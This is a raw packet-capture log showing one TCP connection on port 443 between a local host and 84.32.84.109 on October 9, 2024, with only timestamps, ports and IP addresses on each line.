Oct 9, 2024 16:16:06.811480045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.811527014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.811554909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.811567068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.811593056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.811661959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.811702013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.811706066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.811712980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.811734915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.834570885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.834634066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.834641933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.834655046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.834685087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.835757017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.835825920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.835859060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.835870981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.835886002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.862723112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.862772942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.862824917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.862838984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.862879992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.862890959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.862905025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.862909079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.862938881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.863065958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.863101006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.863106966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.863235950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.863251925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.863260984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.863281012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.866894960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.866939068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.866962910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.866971016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.866990089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867119074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867165089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867180109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867199898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867219925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867227077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867235899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867366076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867413998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867423058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867434025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.867477894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867477894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.867485046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.870826960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.870879889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.870932102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.870939016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.870975018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.870997906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871014118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871020079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871031046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871258020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871258020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871284008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871408939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871468067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871474028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871509075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871638060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871702909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871710062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871763945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871820927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871891022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871944904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871944904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871951103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871965885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.871993065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.871998072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.872009039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.872023106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.872040033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.872082949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.872082949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.872091055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.900213003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.900266886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.900331020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.900401115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.900415897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.900569916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.925036907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.925106049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.925138950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.925153017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.925165892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.925507069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.925590038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.925620079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.925627947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.925971985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.960521936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960568905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960627079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960648060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.960656881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960741997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960761070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.960768938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960788012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960798025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.960918903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.960923910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.960989952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961009026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961016893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961035967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961052895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961074114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961107016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961114883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961114883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961122036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961144924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961169958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961277008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961318016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961323977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961360931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961380005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961384058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961433887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961436987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961479902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961499929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961505890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961524963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961530924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961540937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961577892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961585999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961910963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961952925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961961985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961967945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.961993933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.961999893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962018967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962040901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.962047100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962058067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962068081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.962135077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.962138891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962269068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.962330103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962395906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962414980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.962421894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.962510109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.967760086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.986845016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.986990929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.987016916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.987036943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.987071991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.987080097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.987112045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.987112999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.987123013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.987138033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.987159967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.013068914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.013087034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.013190985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.013209105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.013559103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.013633013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.013947964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.013947964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.013958931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048476934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048543930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048594952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.048594952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.048618078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048655987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048691034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048707962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.048715115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.048732996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049339056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049376011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049395084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049401999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049420118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049429893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049469948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049484968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049491882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049510002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049518108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049530983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049554110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049560070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049571037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049585104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049604893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049633980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049640894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049640894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049647093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049664974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049700022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049794912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049835920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.049837112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049849033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.049876928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.050421953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.050467968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.050486088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.050581932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.050633907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.050693989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.050847054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.050903082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.050911903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.050926924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.050966024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.050971031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.051003933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.051069021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.051301003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.051307917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.051352024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.074487925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.074558020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.074577093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.074589968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.074600935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.074603081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.074637890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.074645996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.074645996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.074655056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.074676037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.075350046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.100956917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.101031065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.101058006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.101078033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.101094007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.101114035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.101130962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.101135969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.101281881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.136946917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137064934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137096882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137113094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137134075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137146950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137212038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137234926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137242079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137396097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137414932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137593985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137645006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137645006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137655020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137696981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137737989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137743950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137773037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137798071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.137805939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137871981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.137897015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138202906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138250113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138250113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138257027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138290882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138330936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138339043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138406992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138427973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138433933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138475895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138540030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138622999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138644934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138650894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138665915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138684988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138890028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138896942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.138902903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.138935089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139004946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139118910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139123917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139136076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139167070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139174938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139278889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139292955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139298916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139326096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139339924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139378071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139384985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139421940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139427900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139502048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139549971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.139560938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.139853954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.162082911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.162178040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.162201881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.162219048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.162256956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.162256956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.162319899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.162419081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.162426949 CEST	443	49723	84.32.84.109	192.168.2.10
